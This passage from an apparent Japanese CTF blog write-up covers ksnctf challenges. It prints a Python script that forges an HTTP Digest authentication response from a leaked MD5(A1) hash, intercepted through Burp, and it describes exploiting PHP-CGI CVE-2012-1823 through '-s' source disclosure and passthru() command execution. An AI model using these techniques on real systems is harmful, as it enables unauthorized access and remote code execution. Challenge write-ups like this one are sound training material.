Authentication-Info: rspauth=&#34;6b566f396d663a64270caed9ec55e44d&#34;, cnonce=&#34;1064eaa9478a0396&#34;, nc=00000003, qop=auth
Last-Modified: Wed, 24 Feb 2021 09:43:22 GMT
ETag: &#34;2a-5bc11dd9be280&#34;
Accept-Ranges: bytes

q9:secret:c627e19450db746b739f41b64097d449
</code></pre><p>Responseの計算に必要な要素を整理する。</p><ul><li>A1：パスワードが不明</li><li>A2：求められる</li><li>response<ul><li>MD5(A1)：わかる</li><li>nonce：アクセス時にサーバーから送られる</li><li>nc：response送信時にクライアントが一緒に送る</li><li>cnonce：上と同じ</li><li>qop：nonceと同じ</li><li>MD5(A2)：求められる</li></ul></li></ul><p>よってBurpを使ってパスワード送信時にInterceptしてresponseを書き換えてやる。</p><p>計算スクリプトは以下。変わる値は消している。</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#f92672>import</span> hashlib
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>md5_A1 <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;c627e19450db746b739f41b64097d449&#39;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>A2 <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;GET:/q9/flag.html&#39;</span>
</span></span><span style=display:flex><span>md5_A2 <span style=color:#f92672>=</span> hashlib<span style=color:#f92672>.</span>md5(A2<span style=color:#f92672>.</span>encode())<span style=color:#f92672>.</span>hexdigest()
</span></span><span style=display:flex><span>print(md5_A2)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>nonce <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;&#39;</span>
</span></span><span style=display:flex><span>nc <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;00000002&#39;</span>
</span></span><span style=display:flex><span>cnonce <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;&#39;</span>
</span></span><span style=display:flex><span>qop <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;auth&#39;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>response<span style=color:#f92672>=</span>md5_A1 <span style=color:#f92672>+</span> <span style=color:#e6db74>&#39;:&#39;</span> <span style=color:#f92672>+</span> nonce <span style=color:#f92672>+</span> <span style=color:#e6db74>&#39;:&#39;</span> <span style=color:#f92672>+</span> nc <span style=color:#f92672>+</span> <span style=color:#e6db74>&#39;:&#39;</span> <span style=color:#f92672>+</span> cnonce <span style=color:#f92672>+</span> <span style=color:#e6db74>&#39;:&#39;</span> <span style=color:#f92672>+</span> qop <span style=color:#f92672>+</span> <span style=color:#e6db74>&#39;:&#39;</span> <span style=color:#f92672>+</span> md5_A2
</span></span><span style=display:flex><span>print(response)
</span></span><span style=display:flex><span>md5_response <span style=color:#f92672>=</span> hashlib<span style=color:#f92672>.</span>md5(response<span style=color:#f92672>.</span>encode())<span style=color:#f92672>.</span>hexdigest()
</span></span><span style=display:flex><span>print(md5_response)
</span></span></code></pre></div><h1 id=10->10 #!</h1><p>SHEBANG</p><h1 id=12-hypertext-preprocessor>12 Hypertext Preprocessor</h1><p>URLにアクセスすると以下の文字列が表示されている。
2012:1823:20:26:02:07:09:27:57:12:40:02:25</p><p>なお、「20:26:」以降はUTCっぽい</p><p>UTCではない最初の「2012:1823」でググるとCVEで、<a href=https://blog.tokumaru.org/2012/05/php-cgi-remote-scripting-cve-2012-1823.html>解説</a>があった。</p><p>脆弱性の判別としてURLに<code>-s</code>をつけてアクセスするとソースコードが表示されたため、cve-2012-1823に対して脆弱である。</p><figure><img src=http://xn--0vq68j2yg.com/images/ksnctf12-1.png></figure><p>徳丸先生のPocを参考にpassthru()でコマンドを投げつけると実行された。あとはcatするだけで良い。</p><figure><img src=http://xn--0vq68j2yg.com/images/ksnctf12-2.png></figure><ul class=pa0></ul><div class="mt6 instapaper_ignoref"></div></div><aside class="w-30-l mt6-l"></aside></article></main><footer class="bg-black bottom-0 w-100 pa3" role=contentinfo><div class="flex justify-between"><a class="f4 fw4 hover-white no-underline white-70 dn dib-ns pv2 ph3" href=http://xn--0vq68j2yg.com/>&copy; 小倉唯.com 2026</a><div><div class=ananke-socials><a href=https://x.com/YSecond821 target=_blank rel=noopener class="twitter ananke-social-link link-transition stackoverflow link dib z-999 pt3 pt0-l mr1" title="Twitter link" aria-label="follow on Twitter——Opens in a new window"><span class=icon><svg style="enable-background:new 0 0 67 67" viewBox="0 0 67 67" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M37.167 22.283c-2.619.953-4.274 3.411-4.086 6.101l.063 1.038-1.048-.127c-3.813-.487-7.145-2.139-9.974-4.915l-1.383-1.377-.356 1.017c-.754 2.267-.272 4.661 1.299 6.271.838.89.649 1.017-.796.487-.503-.169-.943-.296-.985-.233-.146.149.356 2.076.754 2.839.545 1.06 1.655 2.097 2.871 2.712l1.027.487-1.215.021c-1.173.0-1.215.021-1.089.467.419 1.377 2.074 2.839 3.918 3.475l1.299.444-1.131.678c-1.676.976-3.646 1.526-5.616 1.568C19.775 43.256 19 43.341 19 43.405c0 .211 2.557 1.397 4.044 1.864 4.463 1.377 9.765.783 13.746-1.568 2.829-1.673 5.657-5 6.978-8.221.713-1.716 1.425-4.851 1.425-6.354.0-.975.063-1.102 1.236-2.267.692-.678 1.341-1.419 1.467-1.631.21-.403.188-.403-.88-.043-1.781.636-2.033.551-1.152-.402.649-.678 1.425-1.907 1.425-2.267.0-.063-.314.042-.671.233-.377.212-1.215.53-1.844.72l-1.131.361-1.027-.7c-.566-.381-1.361-.805-1.781-.932C39.766 21.902 38.131 21.944 37.167 22.283zM33 64C16.432 64 3 50.569 3 34S16.432 4 33 4s30 13.431 30 30S49.568 64 33 64z" style="fill-rule:evenodd;clip-rule:evenodd"/></svg></span><span class=new-window><svg height="8" style="enable-background:new 0 0 1000 1000" viewBox="0 0 1e3 1e3" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path d="M598 128h298v298h-86V274L392 692l-60-60 418-418H598v-86zM810 810V512h86v298c0 46-40 86-86 86H214c-48 0-86-40-86-86V214c0-46 38-86 86-86h298v86H214v596h596z" style="fill-rule:evenodd;clip-rule:evenodd"/></svg></span></a></div></div></div></footer></body></html>